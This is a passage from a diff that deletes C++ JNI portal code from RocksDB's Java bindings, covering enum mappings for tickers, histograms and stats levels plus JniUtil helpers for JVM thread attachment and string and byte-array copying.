-      case rocksdb::Tickers::NUMBER_MULTIGET_BYTES_READ:
-        return 0x3B;
-      case rocksdb::Tickers::NUMBER_FILTERED_DELETES:
-        return 0x3C;
-      case rocksdb::Tickers::NUMBER_MERGE_FAILURES:
-        return 0x3D;
-      case rocksdb::Tickers::BLOOM_FILTER_PREFIX_CHECKED:
-        return 0x3E;
-      case rocksdb::Tickers::BLOOM_FILTER_PREFIX_USEFUL:
-        return 0x3F;
-      case rocksdb::Tickers::NUMBER_OF_RESEEKS_IN_ITERATION:
-        return 0x40;
-      case rocksdb::Tickers::GET_UPDATES_SINCE_CALLS:
-        return 0x41;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_MISS:
-        return 0x42;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_HIT:
-        return 0x43;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD:
-        return 0x44;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD_FAILURES:
-        return 0x45;
-      case rocksdb::Tickers::WAL_FILE_SYNCED:
-        return 0x46;
-      case rocksdb::Tickers::WAL_FILE_BYTES:
-        return 0x47;
-      case rocksdb::Tickers::WRITE_DONE_BY_SELF:
-        return 0x48;
-      case rocksdb::Tickers::WRITE_DONE_BY_OTHER:
-        return 0x49;
-      case rocksdb::Tickers::WRITE_TIMEDOUT:
-        return 0x4A;
-      case rocksdb::Tickers::WRITE_WITH_WAL:
-        return 0x4B;
-      case rocksdb::Tickers::COMPACT_READ_BYTES:
-        return 0x4C;
-      case rocksdb::Tickers::COMPACT_WRITE_BYTES:
-        return 0x4D;
-      case rocksdb::Tickers::FLUSH_WRITE_BYTES:
-        return 0x4E;
-      case rocksdb::Tickers::NUMBER_DIRECT_LOAD_TABLE_PROPERTIES:
-        return 0x4F;
-      case rocksdb::Tickers::NUMBER_SUPERVERSION_ACQUIRES:
-        return 0x50;
-      case rocksdb::Tickers::NUMBER_SUPERVERSION_RELEASES:
-        return 0x51;
-      case rocksdb::Tickers::NUMBER_SUPERVERSION_CLEANUPS:
-        return 0x52;
-      case rocksdb::Tickers::NUMBER_BLOCK_COMPRESSED:
-        return 0x53;
-      case rocksdb::Tickers::NUMBER_BLOCK_DECOMPRESSED:
-        return 0x54;
-      case rocksdb::Tickers::NUMBER_BLOCK_NOT_COMPRESSED:
-        return 0x55;
-      case rocksdb::Tickers::MERGE_OPERATION_TOTAL_TIME:
-        return 0x56;
-      case rocksdb::Tickers::FILTER_OPERATION_TOTAL_TIME:
-        return 0x57;
-      case rocksdb::Tickers::ROW_CACHE_HIT:
-        return 0x58;
-      case rocksdb::Tickers::ROW_CACHE_MISS:
-        return 0x59;
-      case rocksdb::Tickers::READ_AMP_ESTIMATE_USEFUL_BYTES:
-        return 0x5A;
-      case rocksdb::Tickers::READ_AMP_TOTAL_READ_BYTES:
-        return 0x5B;
-      case rocksdb::Tickers::NUMBER_RATE_LIMITER_DRAINS:
-        return 0x5C;
-      case rocksdb::Tickers::TICKER_ENUM_MAX:
-        return 0x5D;
-      
-      default:
-        // undefined/default
-        return 0x0;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::Tickers enum for the
-  // provided Java org.rocksdb.TickerType
-  static rocksdb::Tickers toCppTickers(jbyte jticker_type) {
-    switch(jticker_type) {
-      case 0x0:
-        return rocksdb::Tickers::BLOCK_CACHE_MISS;
-      case 0x1:
-        return rocksdb::Tickers::BLOCK_CACHE_HIT;
-      case 0x2:
-        return rocksdb::Tickers::BLOCK_CACHE_ADD;
-      case 0x3:
-        return rocksdb::Tickers::BLOCK_CACHE_ADD_FAILURES;
-      case 0x4:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_MISS;
-      case 0x5:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_HIT;
-      case 0x6:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_ADD;
-      case 0x7:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_INSERT;
-      case 0x8:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_EVICT;
-      case 0x9:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_MISS;
-      case 0xA:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_HIT;
-      case 0xB:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_ADD;
-      case 0xC:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_INSERT;
-      case 0xD:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_EVICT;
-      case 0xE:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_MISS;
-      case 0xF:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_HIT;
-      case 0x10:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_ADD;
-      case 0x11:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_BYTES_INSERT;
-      case 0x12:
-        return rocksdb::Tickers::BLOCK_CACHE_BYTES_READ;
-      case 0x13:
-        return rocksdb::Tickers::BLOCK_CACHE_BYTES_WRITE;
-      case 0x14:
-        return rocksdb::Tickers::BLOOM_FILTER_USEFUL;
-      case 0x15:
-        return rocksdb::Tickers::PERSISTENT_CACHE_HIT;
-      case 0x16:
-        return rocksdb::Tickers::PERSISTENT_CACHE_MISS;
-      case 0x17:
-        return rocksdb::Tickers::SIM_BLOCK_CACHE_HIT;
-      case 0x18:
-        return rocksdb::Tickers::SIM_BLOCK_CACHE_MISS;
-      case 0x19:
-        return rocksdb::Tickers::MEMTABLE_HIT;
-      case 0x1A:
-        return rocksdb::Tickers::MEMTABLE_MISS;
-      case 0x1B:
-        return rocksdb::Tickers::GET_HIT_L0;
-      case 0x1C:
-        return rocksdb::Tickers::GET_HIT_L1;
-      case 0x1D:
-        return rocksdb::Tickers::GET_HIT_L2_AND_UP;
-      case 0x1E:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_NEWER_ENTRY;
-      case 0x1F:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_OBSOLETE;
-      case 0x20:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_RANGE_DEL;
-      case 0x21:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_USER;
-      case 0x22:
-        return rocksdb::Tickers::COMPACTION_RANGE_DEL_DROP_OBSOLETE;
-      case 0x23:
-        return rocksdb::Tickers::NUMBER_KEYS_WRITTEN;
-      case 0x24:
-        return rocksdb::Tickers::NUMBER_KEYS_READ;
-      case 0x25:
-        return rocksdb::Tickers::NUMBER_KEYS_UPDATED;
-      case 0x26:
-        return rocksdb::Tickers::BYTES_WRITTEN;
-      case 0x27:
-        return rocksdb::Tickers::BYTES_READ;
-      case 0x28:
-        return rocksdb::Tickers::NUMBER_DB_SEEK;
-      case 0x29:
-        return rocksdb::Tickers::NUMBER_DB_NEXT;
-      case 0x2A:
-        return rocksdb::Tickers::NUMBER_DB_PREV;
-      case 0x2B:
-        return rocksdb::Tickers::NUMBER_DB_SEEK_FOUND;
-      case 0x2C:
-        return rocksdb::Tickers::NUMBER_DB_NEXT_FOUND;
-      case 0x2D:
-        return rocksdb::Tickers::NUMBER_DB_PREV_FOUND;
-      case 0x2E:
-        return rocksdb::Tickers::ITER_BYTES_READ;
-      case 0x2F:
-        return rocksdb::Tickers::NO_FILE_CLOSES;
-      case 0x30:
-        return rocksdb::Tickers::NO_FILE_OPENS;
-      case 0x31:
-        return rocksdb::Tickers::NO_FILE_ERRORS;
-      case 0x32:
-        return rocksdb::Tickers::STALL_L0_SLOWDOWN_MICROS;
-      case 0x33:
-        return rocksdb::Tickers::STALL_MEMTABLE_COMPACTION_MICROS;
-      case 0x34:
-        return rocksdb::Tickers::STALL_L0_NUM_FILES_MICROS;
-      case 0x35:
-        return rocksdb::Tickers::STALL_MICROS;
-      case 0x36:
-        return rocksdb::Tickers::DB_MUTEX_WAIT_MICROS;
-      case 0x37:
-        return rocksdb::Tickers::RATE_LIMIT_DELAY_MILLIS;
-      case 0x38:
-        return rocksdb::Tickers::NO_ITERATORS;
-      case 0x39:
-        return rocksdb::Tickers::NUMBER_MULTIGET_CALLS;
-      case 0x3A:
-        return rocksdb::Tickers::NUMBER_MULTIGET_KEYS_READ;
-      case 0x3B:
-        return rocksdb::Tickers::NUMBER_MULTIGET_BYTES_READ;
-      case 0x3C:
-        return rocksdb::Tickers::NUMBER_FILTERED_DELETES;
-      case 0x3D:
-        return rocksdb::Tickers::NUMBER_MERGE_FAILURES;
-      case 0x3E:
-        return rocksdb::Tickers::BLOOM_FILTER_PREFIX_CHECKED;
-      case 0x3F:
-        return rocksdb::Tickers::BLOOM_FILTER_PREFIX_USEFUL;
-      case 0x40:
-        return rocksdb::Tickers::NUMBER_OF_RESEEKS_IN_ITERATION;
-      case 0x41:
-        return rocksdb::Tickers::GET_UPDATES_SINCE_CALLS;
-      case 0x42:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_MISS;
-      case 0x43:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_HIT;
-      case 0x44:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD;
-      case 0x45:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD_FAILURES;
-      case 0x46:
-        return rocksdb::Tickers::WAL_FILE_SYNCED;
-      case 0x47:
-        return rocksdb::Tickers::WAL_FILE_BYTES;
-      case 0x48:
-        return rocksdb::Tickers::WRITE_DONE_BY_SELF;
-      case 0x49:
-        return rocksdb::Tickers::WRITE_DONE_BY_OTHER;
-      case 0x4A:
-        return rocksdb::Tickers::WRITE_TIMEDOUT;
-      case 0x4B:
-        return rocksdb::Tickers::WRITE_WITH_WAL;
-      case 0x4C:
-        return rocksdb::Tickers::COMPACT_READ_BYTES;
-      case 0x4D:
-        return rocksdb::Tickers::COMPACT_WRITE_BYTES;
-      case 0x4E:
-        return rocksdb::Tickers::FLUSH_WRITE_BYTES;
-      case 0x4F:
-        return rocksdb::Tickers::NUMBER_DIRECT_LOAD_TABLE_PROPERTIES;
-      case 0x50:
-        return rocksdb::Tickers::NUMBER_SUPERVERSION_ACQUIRES;
-      case 0x51:
-        return rocksdb::Tickers::NUMBER_SUPERVERSION_RELEASES;
-      case 0x52:
-        return rocksdb::Tickers::NUMBER_SUPERVERSION_CLEANUPS;
-      case 0x53:
-        return rocksdb::Tickers::NUMBER_BLOCK_COMPRESSED;
-      case 0x54:
-        return rocksdb::Tickers::NUMBER_BLOCK_DECOMPRESSED;
-      case 0x55:
-        return rocksdb::Tickers::NUMBER_BLOCK_NOT_COMPRESSED;
-      case 0x56:
-        return rocksdb::Tickers::MERGE_OPERATION_TOTAL_TIME;
-      case 0x57:
-        return rocksdb::Tickers::FILTER_OPERATION_TOTAL_TIME;
-      case 0x58:
-        return rocksdb::Tickers::ROW_CACHE_HIT;
-      case 0x59:
-        return rocksdb::Tickers::ROW_CACHE_MISS;
-      case 0x5A:
-        return rocksdb::Tickers::READ_AMP_ESTIMATE_USEFUL_BYTES;
-      case 0x5B:
-        return rocksdb::Tickers::READ_AMP_TOTAL_READ_BYTES;
-      case 0x5C:
-        return rocksdb::Tickers::NUMBER_RATE_LIMITER_DRAINS;
-      case 0x5D:
-        return rocksdb::Tickers::TICKER_ENUM_MAX;
-
-      default:
-        // undefined/default
-        return rocksdb::Tickers::BLOCK_CACHE_MISS;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.HistogramType
-class HistogramTypeJni {
- public:
-  // Returns the equivalent org.rocksdb.HistogramType for the provided
-  // C++ rocksdb::Histograms enum
-  static jbyte toJavaHistogramsType(
-      const rocksdb::Histograms& histograms) {
-    switch(histograms) {
-      case rocksdb::Histograms::DB_GET:
-        return 0x0;
-      case rocksdb::Histograms::DB_WRITE:
-        return 0x1;
-      case rocksdb::Histograms::COMPACTION_TIME:
-        return 0x2;
-      case rocksdb::Histograms::SUBCOMPACTION_SETUP_TIME:
-        return 0x3;
-      case rocksdb::Histograms::TABLE_SYNC_MICROS:
-        return 0x4;
-      case rocksdb::Histograms::COMPACTION_OUTFILE_SYNC_MICROS:
-        return 0x5;
-      case rocksdb::Histograms::WAL_FILE_SYNC_MICROS:
-        return 0x6;
-      case rocksdb::Histograms::MANIFEST_FILE_SYNC_MICROS:
-        return 0x7;
-      case rocksdb::Histograms::TABLE_OPEN_IO_MICROS:
-        return 0x8;
-      case rocksdb::Histograms::DB_MULTIGET:
-        return 0x9;
-      case rocksdb::Histograms::READ_BLOCK_COMPACTION_MICROS:
-        return 0xA;
-      case rocksdb::Histograms::READ_BLOCK_GET_MICROS:
-        return 0xB;
-      case rocksdb::Histograms::WRITE_RAW_BLOCK_MICROS:
-        return 0xC;
-      case rocksdb::Histograms::STALL_L0_SLOWDOWN_COUNT:
-        return 0xD;
-      case rocksdb::Histograms::STALL_MEMTABLE_COMPACTION_COUNT:
-        return 0xE;
-      case rocksdb::Histograms::STALL_L0_NUM_FILES_COUNT:
-        return 0xF;
-      case rocksdb::Histograms::HARD_RATE_LIMIT_DELAY_COUNT:
-        return 0x10;
-      case rocksdb::Histograms::SOFT_RATE_LIMIT_DELAY_COUNT:
-        return 0x11;
-      case rocksdb::Histograms::NUM_FILES_IN_SINGLE_COMPACTION:
-        return 0x12;
-      case rocksdb::Histograms::DB_SEEK:
-        return 0x13;
-      case rocksdb::Histograms::WRITE_STALL:
-        return 0x14;
-      case rocksdb::Histograms::SST_READ_MICROS:
-        return 0x15;
-      case rocksdb::Histograms::NUM_SUBCOMPACTIONS_SCHEDULED:
-        return 0x16;
-      case rocksdb::Histograms::BYTES_PER_READ:
-        return 0x17;
-      case rocksdb::Histograms::BYTES_PER_WRITE:
-        return 0x18;
-      case rocksdb::Histograms::BYTES_PER_MULTIGET:
-        return 0x19;
-      case rocksdb::Histograms::BYTES_COMPRESSED:
-        return 0x1A;
-      case rocksdb::Histograms::BYTES_DECOMPRESSED:
-        return 0x1B;
-      case rocksdb::Histograms::COMPRESSION_TIMES_NANOS:
-        return 0x1C;
-      case rocksdb::Histograms::DECOMPRESSION_TIMES_NANOS:
-        return 0x1D;
-      case rocksdb::Histograms::READ_NUM_MERGE_OPERANDS:
-        return 0x1E;
-      case rocksdb::Histograms::HISTOGRAM_ENUM_MAX:
-        return 0x1F;
-
-      default:
-        // undefined/default
-        return 0x0;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::Histograms enum for the
-  // provided Java org.rocksdb.HistogramsType
-  static rocksdb::Histograms toCppHistograms(jbyte jhistograms_type) {
-    switch(jhistograms_type) {
-      case 0x0:
-        return rocksdb::Histograms::DB_GET;
-      case 0x1:
-        return rocksdb::Histograms::DB_WRITE;
-      case 0x2:
-        return rocksdb::Histograms::COMPACTION_TIME;
-      case 0x3:
-        return rocksdb::Histograms::SUBCOMPACTION_SETUP_TIME;
-      case 0x4:
-        return rocksdb::Histograms::TABLE_SYNC_MICROS;
-      case 0x5:
-        return rocksdb::Histograms::COMPACTION_OUTFILE_SYNC_MICROS;
-      case 0x6:
-        return rocksdb::Histograms::WAL_FILE_SYNC_MICROS;
-      case 0x7:
-        return rocksdb::Histograms::MANIFEST_FILE_SYNC_MICROS;
-      case 0x8:
-        return rocksdb::Histograms::TABLE_OPEN_IO_MICROS;
-      case 0x9:
-        return rocksdb::Histograms::DB_MULTIGET;
-      case 0xA:
-        return rocksdb::Histograms::READ_BLOCK_COMPACTION_MICROS;
-      case 0xB:
-        return rocksdb::Histograms::READ_BLOCK_GET_MICROS;
-      case 0xC:
-        return rocksdb::Histograms::WRITE_RAW_BLOCK_MICROS;
-      case 0xD:
-        return rocksdb::Histograms::STALL_L0_SLOWDOWN_COUNT;
-      case 0xE:
-        return rocksdb::Histograms::STALL_MEMTABLE_COMPACTION_COUNT;
-      case 0xF:
-        return rocksdb::Histograms::STALL_L0_NUM_FILES_COUNT;
-      case 0x10:
-        return rocksdb::Histograms::HARD_RATE_LIMIT_DELAY_COUNT;
-      case 0x11:
-        return rocksdb::Histograms::SOFT_RATE_LIMIT_DELAY_COUNT;
-      case 0x12:
-        return rocksdb::Histograms::NUM_FILES_IN_SINGLE_COMPACTION;
-      case 0x13:
-        return rocksdb::Histograms::DB_SEEK;
-      case 0x14:
-        return rocksdb::Histograms::WRITE_STALL;
-      case 0x15:
-        return rocksdb::Histograms::SST_READ_MICROS;
-      case 0x16:
-        return rocksdb::Histograms::NUM_SUBCOMPACTIONS_SCHEDULED;
-      case 0x17:
-        return rocksdb::Histograms::BYTES_PER_READ;
-      case 0x18:
-        return rocksdb::Histograms::BYTES_PER_WRITE;
-      case 0x19:
-        return rocksdb::Histograms::BYTES_PER_MULTIGET;
-      case 0x1A:
-        return rocksdb::Histograms::BYTES_COMPRESSED;
-      case 0x1B:
-        return rocksdb::Histograms::BYTES_DECOMPRESSED;
-      case 0x1C:
-        return rocksdb::Histograms::COMPRESSION_TIMES_NANOS;
-      case 0x1D:
-        return rocksdb::Histograms::DECOMPRESSION_TIMES_NANOS;
-      case 0x1E:
-        return rocksdb::Histograms::READ_NUM_MERGE_OPERANDS;
-      case 0x1F:
-        return rocksdb::Histograms::HISTOGRAM_ENUM_MAX;
-
-      default:
-        // undefined/default
-        return rocksdb::Histograms::DB_GET;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.StatsLevel
-class StatsLevelJni {
- public:
-  // Returns the equivalent org.rocksdb.StatsLevel for the provided
-  // C++ rocksdb::StatsLevel enum
-  static jbyte toJavaStatsLevel(
-      const rocksdb::StatsLevel& stats_level) {
-    switch(stats_level) {
-      case rocksdb::StatsLevel::kExceptDetailedTimers:
-        return 0x0;
-      case rocksdb::StatsLevel::kExceptTimeForMutex:
-        return 0x1;
-      case rocksdb::StatsLevel::kAll:
-        return 0x2;
-
-      default:
-        // undefined/default
-        return 0x0;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::StatsLevel enum for the
-  // provided Java org.rocksdb.StatsLevel
-  static rocksdb::StatsLevel toCppStatsLevel(jbyte jstats_level) {
-    switch(jstats_level) {
-      case 0x0:
-        return rocksdb::StatsLevel::kExceptDetailedTimers;
-      case 0x1:
-        return rocksdb::StatsLevel::kExceptTimeForMutex;
-      case 0x2:
-        return rocksdb::StatsLevel::kAll;
-
-      default:
-        // undefined/default
-        return rocksdb::StatsLevel::kExceptDetailedTimers;
-    }
-  }
-};
-
-// various utility functions for working with RocksDB and JNI
-class JniUtil {
- public:
-    /**
-     * Obtains a reference to the JNIEnv from
-     * the JVM
-     *
-     * If the current thread is not attached to the JavaVM
-     * then it will be attached so as to retrieve the JNIEnv
-     *
-     * If a thread is attached, it must later be manually
-     * released by calling JavaVM::DetachCurrentThread.
-     * This can be handled by always matching calls to this
-     * function with calls to {@link JniUtil::releaseJniEnv(JavaVM*, jboolean)}
-     *
-     * @param jvm (IN) A pointer to the JavaVM instance
-     * @param attached (OUT) A pointer to a boolean which
-     *     will be set to JNI_TRUE if we had to attach the thread
-     *
-     * @return A pointer to the JNIEnv or nullptr if a fatal error
-     *     occurs and the JNIEnv cannot be retrieved
-     */
-    static JNIEnv* getJniEnv(JavaVM* jvm, jboolean* attached) {
-      assert(jvm != nullptr);
-
-      JNIEnv *env;
-      const jint env_rs = jvm->GetEnv(reinterpret_cast<void**>(&env),
-          JNI_VERSION_1_2);
-
-      if(env_rs == JNI_OK) {
-        // current thread is already attached, return the JNIEnv
-        *attached = JNI_FALSE;
-        return env;
-      } else if(env_rs == JNI_EDETACHED) {
-        // current thread is not attached, attempt to attach
-        const jint rs_attach = jvm->AttachCurrentThread(reinterpret_cast<void**>(&env), NULL);
-        if(rs_attach == JNI_OK) {
-          *attached = JNI_TRUE;
-          return env;
-        } else {
-          // error, could not attach the thread
-          std::cerr << "JniUtil::getJinEnv - Fatal: could not attach current thread to JVM!" << std::endl;
-          return nullptr;
-        }
-      } else if(env_rs == JNI_EVERSION) {
-        // error, JDK does not support JNI_VERSION_1_2+
-        std::cerr << "JniUtil::getJinEnv - Fatal: JDK does not support JNI_VERSION_1_2" << std::endl;
-        return nullptr;
-      } else {
-        std::cerr << "JniUtil::getJinEnv - Fatal: Unknown error: env_rs=" << env_rs << std::endl;
-        return nullptr;
-      }
-    }
-
-    /**
-     * Counterpart to {@link JniUtil::getJniEnv(JavaVM*, jboolean*)}
-     *
-     * Detachess the current thread from the JVM if it was previously
-     * attached
-     *
-     * @param jvm (IN) A pointer to the JavaVM instance
-     * @param attached (IN) JNI_TRUE if we previously had to attach the thread
-     *     to the JavaVM to get the JNIEnv
-     */
-    static void releaseJniEnv(JavaVM* jvm, jboolean& attached) {
-      assert(jvm != nullptr);
-      if(attached == JNI_TRUE) {
-        const jint rs_detach = jvm->DetachCurrentThread();
-        assert(rs_detach == JNI_OK);
-        if(rs_detach != JNI_OK) {
-          std::cerr << "JniUtil::getJinEnv - Warn: Unable to detach current thread from JVM!" << std::endl;
-        }
-      }
-    }
-
-    /**
-     * Copies a Java String[] to a C++ std::vector<std::string>
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jss (IN) The Java String array to copy
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError or ArrayIndexOutOfBoundsException
-     *     exception occurs
-     *
-     * @return A std::vector<std:string> containing copies of the Java strings
-     */
-    static std::vector<std::string> copyStrings(JNIEnv* env,
-        jobjectArray jss, jboolean* has_exception) {
-          return rocksdb::JniUtil::copyStrings(env, jss,
-              env->GetArrayLength(jss), has_exception);
-    }
-
-    /**
-     * Copies a Java String[] to a C++ std::vector<std::string>
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jss (IN) The Java String array to copy
-     * @param jss_len (IN) The length of the Java String array to copy
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError or ArrayIndexOutOfBoundsException
-     *     exception occurs
-     *
-     * @return A std::vector<std:string> containing copies of the Java strings
-     */
-    static std::vector<std::string> copyStrings(JNIEnv* env,
-        jobjectArray jss, const jsize jss_len, jboolean* has_exception) {
-      std::vector<std::string> strs;
-      for (jsize i = 0; i < jss_len; i++) {
-        jobject js = env->GetObjectArrayElement(jss, i);
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          *has_exception = JNI_TRUE;
-          return strs;
-        }
-
-        jstring jstr = static_cast<jstring>(js);
-        const char* str = env->GetStringUTFChars(jstr, nullptr);
-        if(str == nullptr) {
-          // exception thrown: OutOfMemoryError
-          env->DeleteLocalRef(js);
-          *has_exception = JNI_TRUE;
-          return strs;
-        }
-
-        strs.push_back(std::string(str));
-
-        env->ReleaseStringUTFChars(jstr, str);
-        env->DeleteLocalRef(js);
-      }
-
-      *has_exception = JNI_FALSE;
-      return strs;
-    }
-
-    /**
-     * Copies a jstring to a std::string
-     * and releases the original jstring
-     *
-     * If an exception occurs, then JNIEnv::ExceptionCheck()
-     * will have been called
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param js (IN) The java string to copy
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError exception occurs
-     *
-     * @return A std:string copy of the jstring, or an
-     *     empty std::string if has_exception == JNI_TRUE
-     */
-    static std::string copyString(JNIEnv* env, jstring js,
-        jboolean* has_exception) {
-      const char *utf = env->GetStringUTFChars(js, nullptr);
-      if(utf == nullptr) {
-        // exception thrown: OutOfMemoryError
-        env->ExceptionCheck();
-        *has_exception = JNI_TRUE;
-        return std::string();
-      } else if(env->ExceptionCheck()) {
-        // exception thrown
-        env->ReleaseStringUTFChars(js, utf);
-        *has_exception = JNI_TRUE;
-        return std::string();
-      }
-
-      std::string name(utf);
-      env->ReleaseStringUTFChars(js, utf);
-      *has_exception = JNI_FALSE;
-      return name;
-    }
-
-    /**
-     * Copies bytes from a std::string to a jByteArray
-     *
-     * @param env A pointer to the java environment
-     * @param bytes The bytes to copy
-     *
-     * @return the Java byte[] or nullptr if an exception occurs
-     */
-    static jbyteArray copyBytes(JNIEnv* env, std::string bytes) {
-      const jsize jlen = static_cast<jsize>(bytes.size());
-
-      jbyteArray jbytes = env->NewByteArray(jlen);
-      if(jbytes == nullptr) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      env->SetByteArrayRegion(jbytes, 0, jlen,
-        const_cast<jbyte*>(reinterpret_cast<const jbyte*>(bytes.c_str())));
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jbytes);
-        return nullptr;
-      }
-
-      return jbytes;
-    }
-
-    /**
-     * Given a Java byte[][] which is an array of java.lang.Strings
-     * where each String is a byte[], the passed function `string_fn`
-     * will be called on each String, the result is the collected by
-     * calling the passed function `collector_fn`
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jbyte_strings (IN) A Java array of Strings expressed as bytes
-     * @param string_fn (IN) A transform function to call for each String
-     * @param collector_fn (IN) A collector which is called for the result
-     *     of each `string_fn`
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an ArrayIndexOutOfBoundsException or OutOfMemoryError
-     *     exception occurs
-     */
-    template <typename T> static void byteStrings(JNIEnv* env,
-        jobjectArray jbyte_strings,
-        std::function<T(const char*, const size_t)> string_fn,
-        std::function<void(size_t, T)> collector_fn,
-        jboolean *has_exception) {
-      const jsize jlen = env->GetArrayLength(jbyte_strings);
-
-      for(jsize i = 0; i < jlen; i++) {
-        jobject jbyte_string_obj = env->GetObjectArrayElement(jbyte_strings, i);
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          *has_exception = JNI_TRUE;  // signal error
-          return;
-        }
-
-        jbyteArray jbyte_string_ary =
-            reinterpret_cast<jbyteArray>(jbyte_string_obj);
-        T result = byteString(env, jbyte_string_ary, string_fn, has_exception);
-
-        env->DeleteLocalRef(jbyte_string_obj);
-
-        if(*has_exception == JNI_TRUE) {
-          // exception thrown: OutOfMemoryError
-          return;
-        }
-
-        collector_fn(i, result);
-      }
-
-      *has_exception = JNI_FALSE;
-    }
-
-    /**
-     * Given a Java String which is expressed as a Java Byte Array byte[],
-     * the passed function `string_fn` will be called on the String
-     * and the result returned
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jbyte_string_ary (IN) A Java String expressed in bytes
-     * @param string_fn (IN) A transform function to call on the String
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError exception occurs
-     */
-    template <typename T> static T byteString(JNIEnv* env,
-        jbyteArray jbyte_string_ary,
-        std::function<T(const char*, const size_t)> string_fn,
-        jboolean* has_exception) {
-      const jsize jbyte_string_len = env->GetArrayLength(jbyte_string_ary);
-      jbyte* jbyte_string =
-          env->GetByteArrayElements(jbyte_string_ary, nullptr);
-      if(jbyte_string == nullptr) {
-        // exception thrown: OutOfMemoryError
-        *has_exception = JNI_TRUE;
-        return nullptr;  // signal error
-      }
-
-      T result =
-          string_fn(reinterpret_cast<char *>(jbyte_string), jbyte_string_len);
-
-      env->ReleaseByteArrayElements(jbyte_string_ary, jbyte_string, JNI_ABORT);
-
-      *has_exception = JNI_FALSE;
-      return result;
-    }
-
-    /**
-     * Converts a std::vector<string> to a Java byte[][] where each Java String
-     * is expressed as a Java Byte Array byte[].
-     *
-     * @param env A pointer to the java environment
-     * @param strings A vector of Strings
-     *
-     * @return A Java array of Strings expressed as bytes
-     */
-    static jobjectArray stringsBytes(JNIEnv* env, std::vector<std::string> strings) {
-      jclass jcls_ba = ByteJni::getArrayJClass(env);
-      if(jcls_ba == nullptr) {
-        // exception occurred
-        return nullptr;
-      }
-
-      const jsize len = static_cast<jsize>(strings.size());
-
-      jobjectArray jbyte_strings = env->NewObjectArray(len, jcls_ba, nullptr);
-      if(jbyte_strings == nullptr) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      for (jsize i = 0; i < len; i++) {
-        std::string *str = &strings[i];
-        const jsize str_len = static_cast<jsize>(str->size());
-
-        jbyteArray jbyte_string_ary = env->NewByteArray(str_len);
-        if(jbyte_string_ary == nullptr) {
-          // exception thrown: OutOfMemoryError
-          env->DeleteLocalRef(jbyte_strings);
-          return nullptr;
-        }
-
-        env->SetByteArrayRegion(
-          jbyte_string_ary, 0, str_len,
-          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(str->c_str())));
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          env->DeleteLocalRef(jbyte_string_ary);
-          env->DeleteLocalRef(jbyte_strings);
-          return nullptr;
-        }
-
-        env->SetObjectArrayElement(jbyte_strings, i, jbyte_string_ary);
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          // or ArrayStoreException
-          env->DeleteLocalRef(jbyte_string_ary);
-          env->DeleteLocalRef(jbyte_strings);
-          return nullptr;
-        }
-
-        env->DeleteLocalRef(jbyte_string_ary);
-      }
-
-      return jbyte_strings;
-    }
-
-    /*
-     * Helper for operations on a key and value
-     * for example WriteBatch->Put
-     *
-     * TODO(AR) could be extended to cover returning rocksdb::Status
-     * from `op` and used for RocksDB->Put etc.
-     */
-    static void kv_op(
-        std::function<void(rocksdb::Slice, rocksdb::Slice)> op,
-        JNIEnv* env, jobject jobj,
-        jbyteArray jkey, jint jkey_len,
-        jbyteArray jentry_value, jint jentry_value_len) {
-      jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        return;
-      }
-
-      jbyte* value = env->GetByteArrayElements(jentry_value, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        if(key != nullptr) {
-          env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-        }
-        return;
